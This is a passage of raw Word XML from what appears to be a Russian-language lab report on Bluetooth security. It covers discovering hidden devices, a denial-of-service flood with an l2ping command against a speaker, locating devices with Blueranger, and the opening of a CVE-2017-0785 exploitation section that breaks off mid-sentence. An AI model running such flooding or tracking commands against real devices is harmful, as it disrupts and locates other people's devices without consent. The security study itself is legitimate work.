          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009144BE">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">мы начали поиск скрытых </w:t>
      </w:r>
      <w:r w:rsidR="009144BE">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:r w:rsidR="009144BE" w:rsidRPr="009144BE">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009144BE">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>устройств.Для</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009144BE">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> ускорения процесса поиска был совершен поиск устройств только в нужном нам диапазоне заранее узнав </w:t>
      </w:r>
      <w:r w:rsidR="009144BE">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MAC</w:t>
      </w:r>
      <w:r w:rsidR="009144BE" w:rsidRPr="009144BE">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009144BE">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">адрес </w:t>
      </w:r>
      <w:r w:rsidR="009144BE">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:r w:rsidR="009144BE" w:rsidRPr="009144BE">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009144BE">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>адаптера смартфона .Устройство было найдено ,и была выведена информация об устройстве</w:t>
      </w:r>
      <w:r w:rsidR="00C24283">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Рисунок 12)</w:t>
      </w:r>
      <w:r w:rsidR="009144BE">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> ,из которой мы можем узнать производителя устройства ,производителя </w:t>
      </w:r>
      <w:r w:rsidR="009144BE">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SOC</w:t>
      </w:r>
      <w:r w:rsidR="009144BE">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> и доступные </w:t>
      </w:r>
      <w:r w:rsidR="009144BE">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009144BE">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">возможности </w:t>
      </w:r>
      <w:r w:rsidR="00EA7D8C">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">устройства. Эта </w:t>
      </w:r>
      <w:r w:rsidR="00EA7D8C" w:rsidRPr="00390FED">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>информация имеет</w:t>
      </w:r>
      <w:r w:rsidR="00EA7D8C">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> ценность ,если необходим дальнейший поиск уязвимостей устройства ,так как могут иметь место уязвимости устройств конкретного производителя</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA7D8C">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">на конкретном </w:t>
      </w:r>
      <w:r w:rsidR="00EA7D8C">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SOC</w:t>
      </w:r>
      <w:r w:rsidR="00EA7D8C" w:rsidRPr="00EA7D8C">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D46B37" w:rsidRDefault="0007435A" w:rsidP="00CA6DC7">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5940425" cy="331918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319180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00786AF5" w:rsidRPr="00786AF5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C24283" w:rsidRPr="00C24283" w:rsidRDefault="00C24283" w:rsidP="00C24283">
      <w:r>
        <w:t xml:space="preserve">Рисунок 12 – Поиск скрытого устройства </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00731752" w:rsidRDefault="00786AF5" w:rsidP="00D46B37">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00786AF5">
        <w:t>DDoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00786AF5">
        <w:t xml:space="preserve"> атака на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00786AF5">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00786AF5">
        <w:t xml:space="preserve"> устройство</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A69B8" w:rsidRPr="007A69B8" w:rsidRDefault="007A69B8" w:rsidP="007A69B8">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> реально провести, когда </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>хостовый</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> девайс («</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>master</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">») выполняет работу, во много раз превосходящую клиентскую. Такую ситуацию называют </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>атакой на отказ в обслуживании (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Denial</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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">). Она может подвесить телефон или привести к быстрой разрядке батарейки. Провести атаку можно несколькими способами. Начнем со стандартных средств. Самое очевидное – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>пинговать</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> девайс пакетами большого размера. Сделать это можно, указав утилите l2ping в качестве параметра «-s» </w:t>
      </w:r>
      <w:r w:rsidR="00C24283">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>флаг</w:t>
      </w:r>
      <w:r w:rsidR="00C24283" w:rsidRPr="007A69B8">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C24283">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(Рисунок 13).</w:t>
      </w:r>
      <w:r w:rsidR="00C24283" w:rsidRPr="007A69B8">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Сама</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> программа, похожа на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> среде и служит для проверки связи и наличия соединения.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MAC</w:t>
      </w:r>
      <w:r w:rsidRPr="007A69B8">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">адрес для атаки мы можем узнать </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>описаным</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> выше способом</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A69B8" w:rsidRPr="007A69B8" w:rsidRDefault="007A69B8" w:rsidP="007A69B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A69B8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>l2ping -s 600 -b "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>МАС</w:t>
      </w:r>
      <w:r w:rsidRPr="007A69B8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>адрес</w:t>
      </w:r>
      <w:r w:rsidRPr="007A69B8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C24283" w:rsidRDefault="003F5C29" w:rsidP="002B5C0C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EE44D85" wp14:editId="46547B3A">
            <wp:extent cx="5295900" cy="2133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2133600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B5C0C" w:rsidRPr="00C24283" w:rsidRDefault="00C24283" w:rsidP="002B5C0C">
      <w:r w:rsidRPr="00C24283">
        <w:t xml:space="preserve">Рисунок 13 – выполнение команды </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00C24283">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C24283">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r w:rsidRPr="00C24283">
        <w:t xml:space="preserve"> пакетами большого размера</w:t>
      </w:r>
      <w:r w:rsidR="007A69B8" w:rsidRPr="00C24283">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A69B8" w:rsidRDefault="007A69B8" w:rsidP="002B5C0C">
      <w:r w:rsidRPr="007A69B8">
        <w:t>Посыла</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">я на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:r w:rsidRPr="007A69B8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">колонку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JBL</w:t>
      </w:r>
      <w:r w:rsidRPr="007A69B8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GO</w:t>
      </w:r>
      <w:r w:rsidRPr="007A69B8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>пакеты большого размера устройство перестает быть видимым для других (даже уже сопряженных устройств ) При этом даже при попытке включения режима сопряжения на устройстве оно не может быть обнаружено стандартными средствами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A69B8" w:rsidRDefault="007A69B8" w:rsidP="002B5C0C">
      <w:r>
        <w:t>Такая атака ведет не только к отказу устройства от обслуживания и ускоряет разряд встроенной батареи ,но и может привести к перезагрузке/</w:t>
      </w:r>
      <w:r w:rsidR="00D46B37">
        <w:t xml:space="preserve"> «зависанию»</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> устройства.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D46B37" w:rsidRDefault="00D46B37" w:rsidP="00D46B37">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Обнаружение физического местоположения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:r w:rsidRPr="00D46B37">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>устройства.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D46B37" w:rsidRPr="00C24283" w:rsidRDefault="00D46B37" w:rsidP="00D46B37">
      <w:r>
        <w:t xml:space="preserve">Используя утилиту </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Blueranger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00D46B37">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00D46B37">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">мы можем определить примерное расстояние </w:t>
      </w:r>
      <w:r w:rsidR="00C24283">
        <w:t xml:space="preserve">до устройства по его </w:t>
      </w:r>
      <w:r w:rsidR="00C24283">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MAC</w:t>
      </w:r>
      <w:r w:rsidR="00C24283" w:rsidRPr="00C24283">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C24283">
        <w:t>адресу.(Рисунок 14,15)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00425A9B" w:rsidRDefault="003F5C29" w:rsidP="00D46B37">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A1D593B" wp14:editId="2DBE1772">
            <wp:extent cx="2938840" cy="2624571"/>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6391" cy="2631314"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F5C29" w:rsidRDefault="00C24283" w:rsidP="00D46B37">
      <w:r>
        <w:t>Рисунок 14 - в</w:t>
      </w:r>
      <w:r w:rsidR="003F5C29">
        <w:t xml:space="preserve">близи устройства.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F5C29" w:rsidRDefault="003F5C29" w:rsidP="00D46B37">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="175D11D1" wp14:editId="417CD3D0">
            <wp:extent cx="3295650" cy="2895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650" cy="2895600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F5C29" w:rsidRDefault="00C24283" w:rsidP="00D46B37">
      <w:r>
        <w:t>Рисунок 14 – п</w:t>
      </w:r>
      <w:r w:rsidR="003F5C29">
        <w:t>ри удалении от устройства.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00425A9B" w:rsidRPr="00CA6DC7" w:rsidRDefault="00425A9B" w:rsidP="00D46B37">
      <w:r>
        <w:t>Раскрытие физического расположения устройство может быть использовано злоумышленником</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>для установления сопряженного соединения и кражи данных .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B5C0C" w:rsidRDefault="0058135C" w:rsidP="0058135C">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Реализация уязвимости </w:t>
      </w:r>
      <w:r w:rsidRPr="0058135C">
        <w:t>CVE-2017-0785</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00685E0E" w:rsidRPr="00E513F3" w:rsidRDefault="00685E0E" w:rsidP="00685E0E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E513F3">
        <w:t xml:space="preserve">SDP-сервер </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:t>Android</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:t xml:space="preserve"> определяет аналогичную структуру состояний продолжения:</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000088"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">typedef struct </w:t>
      </w:r>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660066"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">uint16_t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>cont_offset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00685E0E" w:rsidRPr="00E513F3" w:rsidRDefault="00685E0E" w:rsidP="00685E0E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="660066"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pP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660066"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>sdp_cont_state_t</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="660066"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00685E0E" w:rsidRDefault="00685E0E" w:rsidP="007B67FD">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:ind w:firstLine="851"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE21FF">
        <w:t>SDP Continuation Struct used in Android’s Bluetooth stack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00685E0E" w:rsidRPr="00EE21FF" w:rsidRDefault="00685E0E" w:rsidP="00685E0E">
      <w:pPr>
        <w:pStyle w:val="ae"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00685E0E" w:rsidRPr="00685E0E" w:rsidRDefault="00685E0E" w:rsidP="00685E0E">
      <w:r w:rsidRPr="00E513F3">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">В этом случае в структуре продолжения отправляется только смещение продолжения (которое имеет аналогичное значение для индекса, используемого в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BlueZ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:t xml:space="preserve">). Хотя код обработчика запросов поиска </w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SDP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:t xml:space="preserve">-сервера </w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:t xml:space="preserve"> выполняет некоторые проверки на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
